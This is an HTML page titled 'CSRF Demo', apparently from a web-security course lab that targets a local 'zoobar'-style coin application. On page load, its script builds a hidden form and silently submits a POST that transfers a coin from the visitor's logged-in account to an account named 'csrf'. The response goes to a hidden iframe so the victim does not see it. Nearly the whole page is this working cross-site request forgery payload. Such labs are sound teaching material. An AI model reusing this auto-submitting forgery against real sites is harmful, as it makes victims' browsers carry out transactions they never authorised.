<!doctype html>
<html class="no-js" lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <title>CSRF Demo</title>
    <meta name="description" content="Demo of using clickjacking to transfer zoobar.">
    <meta name="author" content="Feross Aboukhadijeh and Judy">

    <!--<link rel="stylesheet" href="style.css">-->
    <!--<link rel="shortcut icon" href="../img/icon.ico" />-->
</head>

<body>


<h1>hello, world.</h1>
<h2>当前登陆账户转账1个币至用户名为csrf的账户</h2>
<iframe name="myframe1" style="display:none;"></iframe>
<script>

var f=document.createElement("form");
f.method="post";
f.id="myform";
f["target"]="myframe1";
f.action="http://localhost:8080/USTCWebSecurity/transfer.php";
f.style.display="none";

var i = document.createElement("input");
i.name="sendAmount";
i.value=1;
f.appendChild(i);

var i = document.createElement("input");
i.name="receiver";
i.value="csrf";
f.appendChild(i);

var i = document.createElement("input");
i.name="transfer_coins";
i.value="Send";
f.appendChild(i);

document.getElementsByTagName("body")[0].appendChild(f);
document.forms["myform"].submit();



</script>

</body>
</html>


